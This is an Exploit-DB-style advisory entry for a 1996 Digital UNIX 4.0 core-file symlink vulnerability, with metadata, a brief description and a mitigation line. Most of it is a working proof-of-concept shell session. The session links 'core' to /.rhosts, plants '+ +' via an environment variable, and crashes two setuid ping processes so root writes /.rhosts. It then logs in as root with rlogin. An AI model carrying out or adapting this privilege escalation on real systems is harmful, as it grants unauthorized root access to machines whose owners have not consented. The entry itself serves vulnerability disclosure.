Digital UNIX 4.0 Core File Symlink Vulnerability

vendor:

Digital UNIX

by:

SecurityFocus

7.2

CVSS

HIGH

Symlink Vulnerability

CWE

Product Name: Digital UNIX

Affected Version From: Digital UNIX 4.0

Affected Version To: Digital UNIX 4.0

Patch Exists: YES

Related CWE: N/A

CPE: o:digital:digital_unix:4.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

1996

Digital UNIX 4.0 Core File Symlink Vulnerability

Digital UNIX 4.0 will follow symlinks while writting core files if two setuid programs dump core in sucession. The core file is owned by root but with the user's groud id. The core file permissions are 0600. This can be used to create root owned file anywhere in the filesystem.

Mitigation:

Ensure that core files are not created in a world-writable directory.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/74/info

Digital UNIX 4.0 will follow symlinks while writting core files if two setuid programs dump core in sucession. The core file is owned by root but with the user's groud id. The core file permissions are 0600. This can be used to create root owned file anywhere in the filesystem.

$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
##/.rhosts has been created....that's all.##
$ rlogin localhost -l root